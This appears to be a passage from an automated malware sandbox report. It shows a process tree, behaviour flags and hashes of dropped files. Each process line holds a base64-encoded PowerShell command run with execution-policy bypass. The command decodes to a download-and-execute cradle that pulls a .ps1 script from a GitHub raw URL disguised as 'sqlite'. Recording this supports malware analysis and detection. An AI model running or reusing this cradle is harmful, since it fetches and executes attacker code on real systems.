C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3368
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9dbe0e09de872822a2eb3006fdd844a0
SHA1cc55a8021023b763d7886a144cae9d84dc6cee24
SHA25685b4968aa7f7cb82e7d1276a834bc03ab8a2f3b9da34e357bc34e9528d9cde3d
SHA51225c395c9f14ac2a2b8629248d2b186b48c3def127cebf898f346e3299fbc7c6850478c2ef130b75aa497200f152702ef1f0c43a987ae6e006a2835e258ec9c8c
-
MD5
f561ff6645c3c086f8c4c52cb4ca4bd8
SHA118a26cb4b0b46f8ad029bcbc4ab3af2cc1e9d365
SHA25668f0509a34426432e4a043a03fcbcccd0621026004c05a51bcb8b5f94d592c58
SHA512206706f84c4ea6a3da4dbbe928c07db6101c6ef47213e4635bb68c01bd542748f0eef5d8e45180b521a125be09f345eac94202d4ccc924ec0d6778375b84fa52
-
MD5
8ea41b95990d5d7052e34d197a2c0eb7
SHA18fb06db36707d3ca35ddb67b8f7de70249e90d69
SHA256b4f53c51611089edbf9f7a776e3569f4fd0d7e541b99df87ea13c015d4aaf1e1
SHA512df2d0e4222b4b94d8ee665edf8b2f91be39da178a4b25815979851c54110acb79e662b778f1eaff67cc1e738a654b2a5d810ccb5888b850f781e9f06d6d9e0ea
-
MD5
fe552aa471e3747e57ddeff23d6da1fc
SHA116832293206ec339d47940533443f4fb375826fa
SHA25660122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
SHA5128cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6
-
MD5
bb7e477af2363beacb237f0c8dd20f54
SHA1d56c4020d512b8499686340914ae6e472784b943
SHA256cc555ab6172f4d6d62d42ba96d0854443289625da6f790bd1e2002a4226c13a7
SHA5120779fee27eaa4c60a76b6c156b268c276b56eaae5ee076d100716c58936d2583e184a3f8abaf01014915b681879a608060b4d866ae4164c4cb03cf2bf72d3d5f
-
MD5
c13860727871a39063e0bb58117919ba
SHA14f91c6240d459858b7723e843d2ed37e1e9d152b
SHA2568fa363bec94402d57a8c1acb288e9d9ca0a28eee18d300359e83252c60e01719
SHA512348c5ecd6f06a114c11b100a95b89687a3064afe1fd5c3874772938a463c29d23938a1bca967734c19fd06bcf97f5d75c78431305912e06f1d73ceb83db48ec6
-
MD5
aa6bf98c9120b0539c0270a3e453ddf6
SHA1982bae56ad251639d34412d40bd7c0f2c2f4ff7a
SHA2567ca008588561777420954419f28471ffc53dded26af0c640991ecf80de490d99
SHA512d633dfa60bd26d516e4b659f66ca32deabf11ae5334ab3d187dd71d8137d56f92273af0a6abdc56b6af270d4821ab86ca5dacecb849e6151ffa929328ad0c74c